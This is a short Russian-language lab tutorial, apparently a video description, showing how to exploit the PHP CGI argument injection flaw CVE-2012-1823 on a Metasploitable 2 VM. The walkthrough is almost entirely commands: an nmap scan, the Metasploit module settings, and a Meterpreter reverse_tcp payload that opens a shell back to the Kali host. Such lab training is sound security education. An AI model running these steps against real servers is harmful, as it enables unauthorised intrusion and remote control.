
В этом видео демонстрируется эксплуатация уязвимости PHP CGI Argument Injection (CVE-2012-1823) на сервере Metasploitable 2 с помощью Kali Linux и Metasploit.
Определите IP Metasploitable с Kali:
ip a
Например:
Kali: 192.168.56.101
Metasploitable2: 192.168.56.102
Проверяем порт и сервис:
nmap -p 80 192.168.56.102
Также можно проверить в браузере:
msfconsole
search php cgi
Правильный модуль:
use exploit/multi/http/php_cgi_arg_injection
set RHOSTS 192.168.56.102
set RPORT 80
set TARGETURI /
Выбираем полезную нагрузку (payload):
set PAYLOAD php/meterpreter/reverse_tcp
set LHOST 192.168.56.101
set LPORT 4444
Проверяем:
show options
run
или
exploit
Если всё прошло успешно:
Meterpreter session 1 opened
sysinfo
whoami